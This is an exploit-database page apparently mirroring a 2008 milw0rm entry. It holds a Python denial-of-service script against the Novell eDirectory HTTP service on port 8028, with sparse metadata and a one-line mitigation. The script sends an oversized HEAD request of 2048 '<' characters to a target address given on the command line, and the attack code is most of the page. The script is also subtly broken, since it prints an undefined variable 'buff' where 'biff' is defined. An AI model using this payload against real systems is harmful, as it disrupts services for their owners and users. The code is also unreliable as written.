header-logo
Suggest Exploit
vendor:
eDirectory
by:
Mati Aharoni
8.8
CVSS
HIGH
Denial of Service
400
CWE
Product Name: eDirectory
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2008

Novel eDirectory HTTP DOS

This exploit sends a large payload of 2048 characters to the eDirectory HTTP service on port 8028, causing a denial of service.

Mitigation:

Disable the eDirectory HTTP service on port 8028 or restrict access to it.
Source

Exploit-DB raw data:

#!/usr/bin/python
# Novel eDirectory HTTP DOS
# Discovered and coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/novel-edir.py.txt

import socket
import os
import sys
from time import sleep

biff="<"*2048
print "[*] Payload sent "+ str(len(buff))
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect ( ( sys.argv[1], 8028 ) )
expl.send ( 'HEAD '+biff+' HTTP/1.1\r\nHost: 192.168.1.10:20\r\nUser-Agent: Mozilla/4.0 (Linux 2.6.21.5) Java/1.5.0_02\r\n\r\n')
data=expl.recv(1024)
print data
expl.close()

# milw0rm.com [2008-04-02]

Navigation

Suggest Exploit

Services By CQR